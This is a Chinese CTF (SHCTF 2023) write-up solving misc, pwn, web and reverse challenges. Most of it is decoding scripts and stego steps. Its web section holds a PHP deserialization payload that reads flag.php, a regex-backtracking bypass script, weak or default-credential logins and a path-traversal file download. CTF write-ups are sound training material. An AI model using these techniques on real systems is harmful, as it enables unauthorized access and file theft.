}\d\1\f\a\9\1\7\c\4\a\d\4\_\?\t\H\9\I\R\l\A\_\y\S\a\E\_\y\1\I\A\e\r\_\5\I\_\5\1\H\T\{\g\a\l\f
1
2
3
4
5
6
strr = r'}\d\1\f\a\9\1\7\c\4\a\d\4\_\?\t\H\9\I\R\l\A\_\y\S\a\E\_\y\1\I\A\e\r\_\5\I\_\5\1\H\T\{\g\a\l\f'
flag =''
for i in strr:
    if ord(i) != 92:
        flag += i
print(flag[::-1])

处理后得到

1
flag{TH15_I5_reAI1y_EaSy_AlRI9Ht?_4da4c719af1d}

[WEEK1] 奇怪的Screenshot

猜测为CVE-2023-28303,使用工具对截图修复

得到

百家姓密码,解密后得到

1
flag{CVE-2023-28303-Win11-Snipping-t00l-is-n0t-Secure}

[WEEK2] 表里的码

修改sheet.xml文件,确保表格为29x29,令s=4的为1,其余为0。使用pillow得到二维码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from PIL import Image
import os
from xml.dom.minidom import parse

xml_file = r"sheet2.xml"
strings = ""
domtree = parse(xml_file)
rootNote = domtree.documentElement
row = rootNote.getElementsByTagName('c')
for i in row:
    c = i.toxml()
    if 's="4"' in c:
        strings += '1'
    else:
        strings += '0'
pic = Image.new("RGB",(29,29))
num = 0
for x in range(29):
    for y in range(29):
        if strings[num] == '1':
            pic.putpixel((x,y),(0,0,0))
        else:
            pic.putpixel((x,y),(255,255,255))
        num +=1

pic.show()

扫码后得到

1
flag{j0k3r_1s_my_wif3}

[WEEK2] 可爱的洛琪希

下载压缩包后存在伪加密,使用010修改09为00

得到roxy.txt

1
/9j/4AAQSkZJRgABAQEAYABgAAD/4REYRXhpZgAATU0AKgAAAAgABwEAAAMAAAABA+gAAAEBAAMAAAABBkAAAAESAAMAAAABAAAAAAEyAAIAAAABAAAAAIdpAAQAAAABAAAIepyfAAEAAABOAAAQwuocAAcAAAgYAAAAYgAAAAAc6gAAAAgAAAAAAAAc6gAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

通过base64解图片得到图片

通过010打开得到密文与key

1
2
密文:33736c6e6f7b52626b795f71696966686b76217d
key:nanian

首先使用hex解密密文,再使用维吉尼亚密码得到

1
flag{Roxy_daisuki!}

[WEEK2]图片的秘密

将题目通过binwalk分离后得到图片

使用盲水印工具fft得到flag

[FINAL]问卷

关注公众号进入问卷获得flag

PWN

[WEEK1] nc

使用nc连接后cat flag得到flag

[WEEK1] 口算题

nc 连接后提示需要计算,使用pwntools编写脚本得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import * 
p=remote('112.6.51.212',31745)
p.sendafter('start...',b'\n')
p.recvuntil('\n')
s=p.recv()
s = s.replace(b"\xc3\x97", b"*")
s=s.replace(b"\xc3\xb7",b"/")
answer=eval(s[:-4])
p.sendline(str(answer))
for i in range(199):
    p.recvuntil('\n')
    p.recvuntil('\n')
    s=p.recv()
    s = s.replace(b"\xc3\x97", b"*")
    s = s.replace(b"\xc3\xb7",b"/")
    answer=eval(s[:-4])
    p.sendline(str(answer))

Web

[WEEK1] babyrce

首先使用ls查看路径

再绕过过滤cat flag

[WEEK1] 1zzphp

首先通过数组绕过n的过滤,再通过回溯次数限制绕过c_ode,通过python获取flag

1
2
3
4
5
6
import requests
url = 'http://112.6.51.212:30662//?num[]=m'
payload = {'c_ode':'1111'*260000+'2023SHCTF'} 

response = requests.post(url=url, data=payload)
print(response.text)

[WEEK1] ez_serialize

payload:

1
O:1:%22B%22:1:{s:1:%22q%22;O:1:%22C%22:2:{s:3:%22var%22;N;s:1:%22z%22;O:1:%22D%22:1:{s:1:%22p%22;O:1:%22A%22:1:{s:5:%22var_1%22;s:57:%22php://filter/read=convert.base64-encode/resource=flag.php%22;}}}}

得到flag.php通过base64加密的内容

解密后得到

[WEEK1] 登陆就给flag

通过弱口令admin/password登陆后得到flag

[WEEK1] 飞机大战

查看main.js得到

解密后得到

1
flag{e6cc550d-2a12-47a5-a890-0d522755548e}

[WEEK1] ezphp

[WEEK1] 生成你的邀请函

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
from PIL import Image
import io
url = 'http://112.6.51.212:32990/generate_invitation'

Body = {  
    "name": "g0ubu1i",  
    "imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=1738327323&spec=640&img_type=jpg"
}
re = requests.post(url=url,json=Body)
image_content = re.content
image = Image.open(io.BytesIO(image_content))
image.save("avator.jpg")

得到邀请函上的flag

[WEEK2] EasyCMS

通过默认密码admin/tao登录后台

通过任意文件读取漏洞获得flag

进入后台后任意点击一个下载后抓包,将下载地址改为…/…/…/flag

成功下载到flag

[WEEK3] 快问快答

使用python获取的计算式后将答案提交,最终获得flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import re
import requests
import time
s = requests.Session()  
url = 'http://112.6.51.212:31025/'
r = s.get(url)
r.encoding = 'utf-8'
for w in range(50):
    num = re.findall(re.compile(r'<h3>题目:(.*?)='), r.text)[0]
    time.sleep(1)
    temp = ''
    for i in num:
        if i == "÷":
            temp += "//"
        elif i == "与":
            temp += "&"
        elif i == "x":
            temp += "*"
        elif i == "异":
            temp += "^"
        elif i == "或":
            pass
        else:
            temp += i
    num = temp
    r = s.post(url, data={'answer': eval(num)})
    print (r.text)

RE

[WEEK1]signin

使用ida打开题目后得到flag

[WEEK2] pycode

通过题目得到py文件,再编写解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import base64
value = ''
flag = ''
obfuscated_output = '==AeAF3M-tzO-giQ-AUQosDQ9tGK7MDPuhC47tDNB5Tb8Yn4sdW4'
obfuscated_output= obfuscated_output.replace('t','0')
obfuscated_output = obfuscated_output.replace('4','c')
obfuscated_output = obfuscated_output.replace('-', '+')
output = base64.b64decode(obfuscated_output[::-1]).decode()
for i in range(len(output)):
    temp = output[i]
    temp = chr(ord(temp) - 3)
    value += temp
for i in range(len(value)):
    temp = value[i]
    temp = chr(ord(temp) ^ 8)
    flag += temp
print(flag)